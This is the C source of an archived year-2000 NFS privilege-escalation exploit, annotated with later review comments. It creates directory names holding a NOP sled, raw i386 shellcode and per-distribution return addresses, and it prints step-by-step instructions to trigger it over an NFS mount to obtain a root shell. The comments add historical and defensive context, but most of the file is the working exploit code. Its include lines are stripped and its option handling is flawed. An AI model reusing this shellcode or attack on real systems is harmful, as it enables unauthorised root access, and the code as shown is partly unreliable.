/*
 * * * -> THIS IS VERY PRIVATE AND IS NOT TO BE DISTRIBUTED <- * * *
 * author: tmoggie
 * greetz:
 *   DiGiT - bug discovering,
 *   kil3r, maxiu and all of lam3rZ GrP
 *
 * NOTE(review): historical proof-of-concept (hack.co.za archive, 2000). The
 * program prepares a directory tree inside a locally writable path that is
 * NFS-exported (see usage()/example()). The component names it creates carry
 * a 0x90 NOP sled, a raw machine-code payload and a hard-coded address; the
 * intended trigger, per example(), is a recursive remove of that tree over an
 * NFS mount from another host. The server-side fault itself is not shown in
 * this file. The 0xbfff… constants look like i386 Linux user-space stack
 * addresses, so the vulnerable code presumably ran without ASLR or a
 * non-executable stack — either defeats a fixed-address technique like this
 * on any modern system. Defensive takeaways: keep NFS servers patched; treat
 * local write access to an exported tree as a trust boundary; audit exported
 * trees for maximal-length (255-byte) single-character names, unusual depth
 * and names containing non-printable bytes. The tool is also memory-unsafe
 * in several places (inline notes below); nothing is fixed here.
 */
/* NOTE(review): the five header names were lost in page extraction (the
 * angle-bracketed text was stripped). The calls used below — printf/exit,
 * str*/mem*/bzero, getopt, system, mkdir — point at stdio.h, stdlib.h,
 * string.h/strings.h, unistd.h and sys/stat.h; confirm against the original. */
#include
#include
#include
#include
#include
/* ANSI colour escapes used in the status output. */
#define green "\E[32m"
#define bold "\E[1m"
#define normal "\E[m"
#define red "\E[31m"
/* Raw payload bytes that become the tail of one directory-name component.
 * Contains Linux/i386 int 0x80 (\xcd\x80) sequences; not analysed here.
 * The trailing '/' terminates that path component when the name is built. */
char shellcode[] =
    "\xeb\x2d\x5a\x21\xee\xae\x41\xcd\x80\xfe\x51\xeb\xd2\xad\xdb"
    "\xb1\xc0\xb0\x46\xcd\x80\xc9\xd2\xbe\xf3\xb0\xc0\xcd\x80\x66"
    "\xb9\xff\x09\x89\xf3\xb0\x0f\xcd\x80\x21\xdb\x89\xd8\xfe\xc0"
    "\x6a\xff\xff\xfa\x50\xcd\x80\xdb\x89\xd8\xfe\xc0\xae\xeb\xd2"
    "\xcd\x80\xe8\xce\xff\xff\xff\xff\xff\xff/";
/* Shell command run via system() as the invoking user (overridable with -c).
 * NOTE(review): points at a string literal; the -c handler writes through it. */
char *cmd = "cp /bin/sh /tmp/blah";
/* NOTE(review): the initial 132 is never read — main() overwrites offset with
 * strlen(exp) before the first use. */
int offset = 132; //default offset

/* Print command-line help and exit(0). prog is argv[0]. */
void usage(char *prog)
{
    printf("\nusage: %s <-e dir> [-t target] [-c command] || %s <-h>\n",prog,prog);
    printf("\n -e dir : full path to exported directory\n");
    printf(" -t target : ");
    printf("1 - RH 5.2 (default) 2 - Debian 2.1\n");
    printf("3 - Slack 3.4 4 - Slack 3.6 2.1\n");
    printf("5 - Slack 3.6, se 6 - SuSE 5.3\n");
    printf("the rh 6.0 dosen't work atm :((((\n\n");
    printf(" -c command: cmd to do as a normal user (default: cp /bin/sh /tmp/blah)\n");
    printf(" -h : help, usage example\n\n");
    exit(0);
}

/* Print the author's worked example (-h) and exit(0). prog is argv[0]. */
void example(char *prog)
{
    printf("Ok, let's say you wanna xploit Debian 2.1 with export:\n");
    printf("\t/usr\t*(ro)\n");
    printf("and you have some nice proggie which you want to make suid root:\n");
    printf("\t/home/you/nice-proggie\n");
    printf("If you have +w on /usr/tmp you have to do:\n");
    printf("%s -e /usr/tmp -c \"cp /home/you/nice-proggie /tmp/blah\" -t 2\n", prog);
    printf("Next you have to mount the /usr on some box where you can do it;)\n");
    printf("otherbox# mount -t nfs terget:/usr /mnt\n");
    printf("otherbox# rm -rf /mnt/A[tab]\n\n");
    printf("That's all...\n\n");
    exit(0);
}

/* Entry point: parse options, run the -c command, then mkdir() a chain of
 * six nested components under the export path. Exits via exit() on any
 * failure. NOTE(review): `void main` is non-standard; buf2 is never used
 * and j is assigned but never read. */
void main(int argc, char **argv)
{
    int i,j;
    char buf[4096];     /* the growing absolute path passed to mkdir() */
    char buf2[4096];
    char tmp[4096];     /* scratch for one path component at a time */
    char exp[255] = "!";  /* "!" is the sentinel for "no -e given" */
    int addr = 0xbffa3ad1 ; // RH 5.2
    while (1) {
        i = getopt(argc,argv,"e:c:t:h");
        if (i == -1) break;
        switch (i) {
        /* NOTE(review): unbounded copy into exp[255]. */
        case 'e': strcpy(exp,optarg); break;
        /* NOTE(review): cmd points at a string literal, so this store is
         * undefined behaviour (read-only on most toolchains) and any optarg
         * longer than the literal overruns it. */
        case 'c': strcpy(cmd,optarg); break;
        case 't':
            switch (j=atoi(optarg)) {
            case 1: addr = 0xbffeb567; break; // debian 1.2
            case 2: addr = 0xbffa3ad1; break; // rh 5.2
            case 3: addr = 0xbff9b5af; break; // slack 3.4
            case 4: addr = 0xbffef205; break; // slack 3.6, le
            case 5: addr = 0xbffef225; break; // slack 3.6, se
            case 6: addr = 0xbfff0a5f; break; // suse 5.3
            // case 7: addr = 0xbfffe62f; break; // rh 6.0, dosen't work now :(((
            }
        case 'h': example(argv[0]); break;
        default : usage(argv[0]); break;
        }
    }
    if (!strcmp(exp,"!")) usage(argv[0]);
    /* Ordinary shell-out as the invoking user; it runs before any directory
     * is created and is independent of the path construction below. */
    printf(bold"cmd");
    if (system(cmd) != 0) {
        printf(red"....failed!\n"normal);
        exit(-1);
    }
    printf(normal green"\tOk\n"normal);
    /* NOTE(review): the -e value is discarded here; argv[1] is copied with
     * its own length as the bound, so exp[255] can be overrun by a long
     * argument. */
    bzero(exp,sizeof(exp));
    strncpy(exp,argv[1],strlen(argv[1]));
    offset = strlen(exp);
    /* NOTE(review): reads exp[-1] when argv[1] is the empty string. */
    if (exp[offset-1] != '/') strcat(exp,"/");
    offset = strlen(exp);   /* length of the export path incl. trailing '/' */
    bzero(buf,sizeof(buf));
    /* Component 1-3: 255 'A' bytes + '/' (a maximal-length name). */
    memset(tmp,'A',255);
    tmp[255]='/';
    tmp[256]='\0';
    strncpy(buf,exp,offset);
    printf(bold"dirs");
    for (i=1;i<=3;i++) {
        strncat(buf,tmp,strlen(tmp));
        if (mkdir(buf,0777) < 0) {
            printf(red"...fuck! can't create directory!!! : %d\n"normal,i);
            exit(-1);
        }
    }
    /* Component 4: 'A' padding shortened by strlen(exp), so the total path
     * length stays fixed regardless of the export path given. */
    memset(tmp,'A',255);
    tmp[255-offset]='/';
    tmp[256-offset]='\0';
    strncat(buf,tmp,strlen(tmp));
    if (mkdir(buf,0777) < 0) {
        /* NOTE(review): this literal contains '%' characters that printf
         * parses as conversions with no matching arguments — undefined
         * behaviour on this error path. */
        printf(red"...fuqn offset dirW#$#@%#$^%T#\n"normal);
        exit(-1);
    }
    /* Component 5: 0x90 (NOP) fill with the payload copied to the end; the
     * payload's trailing '/' plus strcpy's NUL close the component. */
    memset(tmp,'\x90',255);
    strcpy(tmp+(255-strlen(shellcode)),shellcode);
    strncat(buf,tmp,strlen(tmp));
    if (mkdir(buf,0777) < 0) {
        printf(red"...fuck!@# shell-dir\n"normal);
        exit(-1);
    }
    /* Component 6: 97 'a' bytes with addr written as a 4-byte int at
     * bytes 93..96. NOTE(review): int store into a char array at an
     * unaligned offset (93 % 4 != 0) — not strictly-conforming C; relies
     * on x86 tolerating unaligned access. */
    memset(tmp,'a',255);
    tmp[97] = '\0';
    *((int*)(tmp+93)) = addr;
    strncat(buf,tmp,strlen(tmp));
    if (mkdir(buf,0777) < 0) {
        printf(red"...fuck!@#!@#!$ addrez-dir ^\n"normal);
        exit(-1);
    }
    printf(normal green"\tOk\n"normal);
    printf("now you have to do: "bold green \
        "rm -rf /path-to-mount-point/A[tab] & \n\n"normal);
}
/* www.hack.co.za [2000]*/